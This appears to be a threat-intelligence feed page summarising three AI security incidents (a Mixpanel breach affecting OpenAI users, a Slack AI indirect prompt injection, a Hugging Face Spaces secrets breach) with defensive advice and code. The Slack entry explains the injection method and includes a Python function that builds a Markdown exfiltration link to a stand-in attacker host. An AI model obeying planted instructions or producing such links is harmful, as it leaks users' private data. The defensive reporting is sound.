Live Feed

AI Threat Intelligence

Real-time AI security incidents, vulnerability disclosures, and data breach alerts. Updated continuously. No spin. No delay.

Active Incidents: 3 · Critical Severity: 0 · Data Source: Curated
MEDIUM
November 9, 2025

OpenAI API User Data Exposed via Mixpanel Vendor Hack

Attackers compromised Mixpanel — a data analytics provider used by OpenAI — via a smishing (SMS phishing) campaign targeting an employee account. A dataset containing analytics data for a subset of OpenAI API platform users was exported without authorisation. Exposed data included names, email addresses, approximate location derived from browser, browser and OS metadata, and OpenAI organisation/user IDs. No chat history, API keys, or payment data was compromised. OpenAI immediately terminated its relationship with Mixpanel and launched expanded vendor security reviews.

OpenAI API Platform · ChatGPT (help centre users) · email addresses · user profiles · location data
⚡ Action Required

Be vigilant for targeted phishing emails referencing OpenAI. Do not click unsolicited links claiming to be from OpenAI support. Rotate your OpenAI API keys as a precaution even though keys were not directly exposed.
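One way to make the precautionary key rotation painless is to never hardcode the key in the first place. A minimal sketch, assuming the conventional `OPENAI_API_KEY` environment variable (adjust the name to your deployment): rotating then becomes a one-line change outside the codebase.

```python
import os

def load_openai_key() -> str:
    """Read the API key from the environment so rotating it never
    requires a code change or redeploy of application source.
    OPENAI_API_KEY is the conventional variable name; adjust to
    match your own configuration."""
    key = os.environ.get("OPENAI_API_KEY")
    if not key:
        raise RuntimeError(
            "OPENAI_API_KEY is not set; export a freshly rotated key."
        )
    return key
```

After rotating in the OpenAI dashboard, only the exported variable needs updating; any key accidentally committed to source control should be treated as compromised regardless.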

Source: OpenAI Security · Read report →
HIGH
August 20, 2024

Slack AI Leaks Private Channel Data via Indirect Prompt Injection

Security researchers at PromptArmor disclosed that Slack AI can be weaponised via indirect prompt injection to exfiltrate data from private channels to which the attacker has no access. By posting a malicious instruction in a public channel, an attacker tricks Slack AI into constructing a Markdown link that silently transmits private message content to an attacker-controlled server — without the victim needing to be in the public channel. After August 14, 2024, Slack expanded ingestion to uploaded documents and Google Drive files, significantly widening the attack surface beyond chat messages.
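The exfiltration mechanism described above can be sketched in a few lines. This is an illustrative reconstruction of the pattern PromptArmor reported, not a working exploit; the host and link text are hypothetical. The injected instructions ask the assistant to wrap stolen text in a Markdown link whose URL carries the secret as a query parameter:

```python
# Illustrative reconstruction of the Markdown-link exfiltration
# pattern -- NOT a working exploit. ATTACKER_HOST and the link
# text are hypothetical placeholders.
from urllib.parse import quote

ATTACKER_HOST = "https://attacker.example"  # hypothetical collection server

def exfil_link(secret: str) -> str:
    """Build the kind of Markdown link the injected prompt asks the
    assistant to emit: the secret rides along in the URL, so a single
    click (or link unfurl) delivers it to the attacker's server."""
    return (
        f"[click here to reauthenticate]"
        f"({ATTACKER_HOST}/leak?data={quote(secret)})"
    )
```

The key property is that the secret leaves the workspace through an outbound HTTP request the victim's client makes, not through anything the attacker can read directly — which is why restricting what the assistant may ingest and render is the practical mitigation.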

Slack AI · private messages · documents · API keys
⚡ Action Required

Disable Slack AI access to documents and uploaded files until a patch is confirmed. Avoid storing API keys or credentials in any Slack channel. Audit your organisation's Slack AI permissions and review which channels AI can ingest.

Source: PromptArmor · Read report →
HIGH
May 31, 2024

Hugging Face Spaces Breach Exposes Authentication Secrets Across AI Projects

Hugging Face detected unauthorised access to its Spaces platform — the central hub used by over 1 million AI researchers and developers to host models, datasets, and live demos. A subset of Spaces secrets (API tokens and service credentials stored by developers) was accessed without authorisation. Hugging Face revoked all affected tokens and notified impacted users by email. The breach triggered a full security overhaul: removal of org-level tokens, introduction of KMS-based secret management, and a partnership with TruffleHog to continuously scan for exposed credentials across the platform.

Hugging Face Spaces · Hugging Face Hub · AI models hosted on HF · API tokens · credentials · secrets
⚡ Action Required

Immediately revoke and regenerate all Hugging Face tokens. Audit any secrets or credentials stored in HF Spaces environment variables. Switch to fine-grained access tokens. Review all downstream services that authenticate using HF tokens.
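The audit step above can be partially automated. A minimal sketch, assuming Hugging Face user access tokens carry their usual `hf_` prefix (the regex is a heuristic, not the official token grammar): walk a project tree and flag anything that looks like a committed token, so it can be revoked and regenerated.

```python
import re
from pathlib import Path

# Hugging Face user access tokens are prefixed with "hf_"; this
# pattern is a heuristic sketch, not the official token grammar.
HF_TOKEN_RE = re.compile(r"\bhf_[A-Za-z0-9]{20,}\b")

def scan_for_hf_tokens(root: str) -> list[tuple[str, str]]:
    """Walk `root` and return (file path, token) pairs for strings
    that look like Hugging Face tokens, so each can be revoked."""
    hits: list[tuple[str, str]] = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
        for match in HF_TOKEN_RE.findall(text):
            hits.append((str(path), match))
    return hits
```

For continuous coverage, a dedicated scanner such as TruffleHog (which the report says Hugging Face now partners with) is the more robust choice; a sketch like this is only a quick first pass.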

Source: Hugging Face Security Team · Read report →
Get alerted the moment a new threat drops

ScanAix Shield Pro sends real-time browser notifications as soon as a new incident is confirmed. Free users get alerts with a 24-hour delay.